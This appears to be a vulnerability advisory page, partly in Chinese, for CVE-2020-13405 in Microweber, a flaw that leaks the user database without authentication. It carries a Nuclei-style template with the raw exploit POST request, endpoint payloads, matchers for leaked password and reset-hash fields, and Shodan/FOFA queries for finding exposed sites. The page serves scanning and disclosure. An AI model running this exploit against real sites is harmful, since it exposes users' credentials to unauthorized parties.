CVE-2020-13405: Microweber <1.1.20 - Information Disclosure

日期: 2025-08-01 | 影响软件: Microweber | POC: 已公开

漏洞描述

Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.

PoC代码[已公开]

id: CVE-2020-13405

info:
  name: Microweber <1.1.20 - Information Disclosure
  author: ritikchaddha,amit-jd
  severity: high
  description: |
    Microweber before 1.1.20 is susceptible to information disclosure via userfiles/modules/users/controller/controller.php. An attacker can disclose the users database via a /modules/ POST request and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
  remediation: |
    Upgrade Microweber to version 1.1.20 or later to mitigate the vulnerability.
  reference:
    - https://rhinosecuritylabs.com/research/microweber-database-disclosure/
    - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13405
    - https://github.com/merlinepedra/RHINOECURITY-CVEs
    - https://github.com/mrnazu/CVE-2020-13405
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-13405
    cwe-id: CWE-306
    epss-score: 0.26866
    epss-percentile: 0.96194
    cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: microweber
    product: microweber
    shodan-query:
      - http.html:"microweber"
      - http.favicon.hash:780351152
    fofa-query:
      - body="microweber"
      - icon_hash=780351152
  tags: cve,cve2020,microweber,unauth,disclosure

http:
  - raw:
      - |
        POST /module/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: {{BaseURL}}admin/view:modules/load_module:users

        module={{endpoint}}

    payloads:
      endpoint:
        - "users/controller"
        - "modules/users/controller"
        - "/modules/users/controller"
    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"username")'
          - 'contains(body,"password")'
          - 'contains(body,"password_reset_hash")'
          - 'status_code==200'
          - 'contains(header,"text/html")'
        condition: and
# digest: 4b0a00483046022100c4795a2743d7952fb8e7ca71692eb07bb99c45a2c8970f6e92a201c7e87ecb0702210081eb5f10cb7f65cf96e9b0336cafed16adb1cb1ff0327bfc03f488c1f8da88a4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐